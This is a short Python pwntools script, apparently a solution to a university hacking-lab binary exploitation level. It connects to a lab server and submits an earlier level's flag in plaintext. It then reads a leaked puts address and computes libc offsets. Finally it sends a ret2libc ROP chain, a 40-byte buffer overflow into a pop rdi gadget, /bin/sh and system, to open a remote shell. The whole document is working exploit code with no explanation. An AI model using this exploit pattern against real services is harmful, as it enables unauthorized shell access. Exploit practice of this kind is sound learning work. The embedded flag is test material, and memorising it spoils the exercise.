# 0x0000000000401293 : pop rdi ; ret

from pwn import *

HOST, PORT = "binexp.stud12.hacklab.ias.tu-bs.de", 4008
p = remote(HOST, PORT)
question = p.recvline(timeout=2)
print("[+] question:", question.decode().strip())

question = p.recvline(timeout=2)
print("[+] question:", question.decode().strip())

payload = "hacklab{0nly_n33d_0n3_7iny_1nfole4k_Bv4KxlTP}"
p.sendline(payload.encode())
print("sending: ", end='')
print(payload)

question = p.recvline(timeout=2)
print("[+] question:", question.decode().strip())

question = p.recvline(timeout=2)
print("[+] question:", question.decode().strip())

#p = process('./level8')

libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
puts_offset   = libc.symbols['puts']           # e.g. 0x080aa0
system_offset = libc.symbols['system']         # e.g. 0x04f550
binsh_offset  = next(libc.search(b'/bin/sh'))  # e.g. 0x1b75aa

print(hex(puts_offset))
print(hex(system_offset))
print(hex(binsh_offset))

#help_input = p.recvline()
help_input = p.recvline()
print(help_input)
puts_abs = int(help_input[-15:-1],16)
print(hex(puts_abs))

p.recvuntil("What do you want to talk about?".encode())

payload  = b'A'*40
payload += p64(0x0000000000401294)
payload += p64(0x0000000000401293)
payload += p64(puts_abs - puts_offset + binsh_offset)
payload += p64(puts_abs - puts_offset + system_offset)
p.sendline(payload)

print("payload: ",payload)

p.interactive()